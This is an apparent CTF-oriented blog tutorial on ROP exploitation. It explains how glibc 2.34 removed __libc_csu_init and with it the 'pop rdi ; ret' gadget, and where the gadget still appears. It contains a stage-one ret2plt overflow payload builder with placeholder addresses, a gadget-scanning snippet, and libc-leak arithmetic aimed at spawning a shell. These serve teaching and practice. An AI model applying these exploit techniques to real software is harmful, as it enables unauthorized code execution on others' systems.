The problem
What happened to ROP?
Ah the classic overflow challenge. By now most people are familiar with this style of exploit, where you have some buffer on the stack, and you can provide more data than what's been allocated for it, leading to a classic overflow. And because it's so well known, so are the techniques for it. Take the simple program below.
It's obvious that we can overflow the buf buffer, so from here we'd typically use the classic ret2plt attack, where we:
Use puts to leak a GOT entry
Return to main
Call system("/bin/sh")
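To make the first two steps concrete, here's a rough sketch of what the stage-one payload usually looks like. Every address and the padding length below are made-up placeholders (they are not taken from the demo binary), and p64 is a small helper defined here so the snippet doesn't depend on any exploit framework.

```python
import struct


def p64(value: int) -> bytes:
    """Pack an integer as a little-endian 64-bit word."""
    return struct.pack("<Q", value)


# Hypothetical values for illustration only; real ones come from the target.
OFFSET_TO_RET = 40       # assumed padding from buf to the saved return address
POP_RDI_RET = 0x401233   # assumed address of a `pop rdi ; ret` gadget
PUTS_PLT = 0x401030      # assumed PLT stub for puts
PUTS_GOT = 0x404018      # assumed GOT slot for puts
MAIN = 0x401156          # assumed address of main


def build_leak_payload() -> bytes:
    """Stage 1: call puts(puts@got), then return to main to overflow again."""
    return b"".join([
        b"A" * OFFSET_TO_RET,  # fill the buffer up to the return address
        p64(POP_RDI_RET),      # load the first argument register...
        p64(PUTS_GOT),         # ...with the address of the GOT entry
        p64(PUTS_PLT),         # puts prints the resolved libc pointer
        p64(MAIN),             # restart the program for stage 2
    ])


payload = build_leak_payload()
print(len(payload), "bytes")
```

Notice that the whole chain hinges on the pop rdi ; ret gadget: without it there is no obvious way to set the argument for puts.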
First we're going to need to find the pop rdi ; ret gadget, so let's run ROPgadget.
Wait a second. Where's pop rdi ; ret? It should be here somewhere, right??? Well, actually a lot of gadgets are missing here, such as:
pop rdi ; ret
pop rsi ; pop r15 ; ret
pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
So what's going on? Let's investigate, shall we?
Where does pop rdi ; ret come from?
Where did it come from, and where did it go? Where did it come from cotton eye joe?
To find this out, let's take an unstripped binary which has this gadget. There are plenty to choose from across countless CTFs, so I chose hackthebox's ropme. Running ROPgadget on it, we find the gadget.
Let's see where this lies in the binary.
So it seems our beloved gadget belongs to a function called __libc_csu_init.
Interestingly, the function's disassembly doesn't seem to contain pop rdi ; ret? That's because pop rdi ; ret doesn't show up in regular code, but rather comes from splitting an instruction in half, specifically pop r15. You may have noticed that we have __libc_csu_init+98 and __libc_csu_init+100 in the disassembly, but pop rdi ; ret is at __libc_csu_init+99.
Quirk of x86
The above is how these instructions get assembled. Notice that pop r15 ; ret is one byte longer, but its last 2 bytes are the same as pop rdi ; ret. That's because pop r15 is encoded as pop rdi with a REX prefix byte (0x41) in front, which extends the register field to select r15 instead of rdi. Since x86 instructions are variable-length (unlike ARM's fixed-length ones), execution can start at any byte offset. So, we could take the address of pop r15 ; ret, increment it by 1, and get pop rdi ; ret.
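Here's a tiny sketch of that byte-level trick. The encodings are the standard x86-64 ones, while the csu_init address is a made-up placeholder purely to show the +98 / +99 arithmetic from the disassembly.

```python
# Standard x86-64 encodings:
#   41 5f  pop r15   (0x41 is the REX.B prefix, 0x5f is `pop` with register 7)
#   5f     pop rdi
#   c3     ret
POP_R15_RET = bytes([0x41, 0x5F, 0xC3])
POP_RDI_RET = bytes([0x5F, 0xC3])

# Jumping one byte into `pop r15 ; ret` skips the prefix entirely.
misaligned = POP_R15_RET[1:]
print(misaligned.hex(), misaligned == POP_RDI_RET)

# Hypothetical address of __libc_csu_init, for illustration only.
csu_init = 0x4011D0
pop_r15_addr = csu_init + 98        # where the disassembler shows pop r15
pop_rdi_addr = pop_r15_addr + 1     # one byte in: pop rdi ; ret
print(hex(pop_rdi_addr))
```

The disassembler never lists the +99 address because it only decodes from instruction boundaries, but the CPU is happy to start decoding there.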
So wherever there is a pop r15, there will also be pop rdi. And since __libc_csu_init will always contain pop r15 ; ret, binaries with __libc_csu_init will have pop rdi ; ret!
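This is roughly how a gadget finder stumbles across it: it scans raw bytes rather than disassembled instructions. Below is a minimal sketch of that idea, where find_pop_rdi_via_pop_r15 is a hypothetical helper (not part of ROPgadget) and the sample bytes and base address are invented for the demo.

```python
from typing import List


def find_pop_rdi_via_pop_r15(code: bytes, base: int = 0) -> List[int]:
    """Return the address of `pop rdi ; ret` inside every `pop r15 ; ret`."""
    pattern = b"\x41\x5f\xc3"  # pop r15 ; ret
    hits = []
    start = 0
    while True:
        idx = code.find(pattern, start)
        if idx == -1:
            break
        hits.append(base + idx + 1)  # skip the 0x41 prefix byte
        start = idx + 1
    return hits


# Invented code bytes: nop ; nop ; pop r14 ; pop r15 ; ret ; nop
sample = b"\x90\x90\x41\x5e\x41\x5f\xc3\x90"
gadgets = find_pop_rdi_via_pop_r15(sample, base=0x401000)
print([hex(addr) for addr in gadgets])
```

A real tool searches for every byte sequence ending in ret, not just this one pattern, but the principle is the same.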
Where did pop rdi ; ret go?
So if any binary containing __libc_csu_init has the pop rdi gadget, what's happening in the demo binary?
Aha! In the demo binary, __libc_csu_init is not present! But why is that?
Well, recently in glibc 2.34, there was a patch which stopped __libc_csu_init being compiled into binaries. The patch was designed to remove useful ROP gadgets for ret2csu, and has the effect of removing pop rdi ; ret in binaries compiled against glibc 2.34+.
Side note on __libc_start_main
This would change a few things, such as __libc_start_main, which took __libc_csu_init as an argument, expecting to run it. Now that it doesn't exist, __libc_start_main still takes the argument but does nothing with it, so it had to be given a new symbol version for 2.34, as it now had different behaviour. This meant that you couldn't run binaries compiled for 2.34+ on older glibc versions, otherwise you'd get the very annoying error:
So you have this patch to thank for this :)
Sooo what now?
So has this completely killed ROP on modern binaries? Has our time spent practising and mastering the art of ROP all been for nothing, and we'll have to move on to other types of exploits entirely?
Woah slow down, I want to argue that it hasn't. While it has thrown a wrench in how we do ROP, there are still tricks we can do to get around this, which I will showcase in the following sections.
Other sources of pop rdi ; ret
For one thing, __libc_csu_init isn't our only source of pop rdi ; ret. Recall that wherever there's pop r15 ; ret there is pop rdi ; ret. But why does pop r15 ; ret show up in __libc_csu_init?
Well, normally when we compile, the variables in a function are stored on the stack. But if we compile using optimization flags (or use register when defining a variable), some variables can be stored in registers instead. The registers typically used are the callee-saved ones: rbx, rbp, r12, r13, r14 and r15. For this to work, a function using these registers must save their old values before using them, and restore them before returning. This is because its callers may be keeping their own values in these registers, which would otherwise get clobbered. So, the function pushes them to the stack at the start, then pops them at the end. If you look back at __libc_csu_init's disassembly above, it follows this same pattern, because it's compiled with optimization.
This means that if your binary is compiled with optimization, there is a chance r15 is used for a variable, meaning it must also be pushed, and more importantly popped, which would result in pop r15 -> pop rdi.
Unfortunately, from my testing, r15 seems to be one of the last ones that gets used, so a function would likely need many register variables for r15 to be used.
This is why glibc will always contain pop rdi: it's compiled with optimization, and there are so many functions with lots of variables stored in registers that it's basically guaranteed that r15 is used in at least one of them.
This means that once you have a libc leak, you'll always be able to find a pop rdi ; ret gadget. However, if all you have is an overflow, and no leak, then this will still cause problems.
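For the leak case, the arithmetic looks something like the sketch below. Both offsets are invented placeholders (the real ones depend on the exact libc build), the leaked bytes are a made-up example, and parse_leak is a hypothetical helper that assumes the pointer arrives as 6 raw bytes, which is typical for userspace addresses printed by puts.

```python
import struct

# Hypothetical offsets for illustration; look these up in the target's libc.
PUTS_OFFSET = 0x80E50      # assumed offset of puts inside libc
POP_RDI_OFFSET = 0x2A3E5   # assumed offset of a `pop rdi ; ret` inside libc


def parse_leak(raw: bytes) -> int:
    """Turn the bytes printed by puts into a 64-bit pointer.

    Assumes 6 significant bytes: puts stops at the first null byte,
    so the two zero top bytes of the address are never printed.
    """
    return struct.unpack("<Q", raw[:6].ljust(8, b"\x00"))[0]


# Made-up leak: 6 pointer bytes followed by the newline that puts appends.
leaked_puts = parse_leak(b"\x50\xee\xa8\xf7\xff\x7f\n")
libc_base = leaked_puts - PUTS_OFFSET
pop_rdi = libc_base + POP_RDI_OFFSET

# A sane libc base is page-aligned, which makes for a handy sanity check.
print(hex(libc_base), libc_base & 0xFFF == 0)
print(hex(pop_rdi))
```

If the base doesn't come out page-aligned, the offset (or the libc version you guessed) is probably wrong.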
Summary
So if your binary doesn't have pop rdi ; ret, then you have a few approaches:
Get a libc leak using a different bug
Control rdi some other way
Use the overflow to leak libc
In the following sections, I'll show some tricks you can use to do the latter 2 approaches :)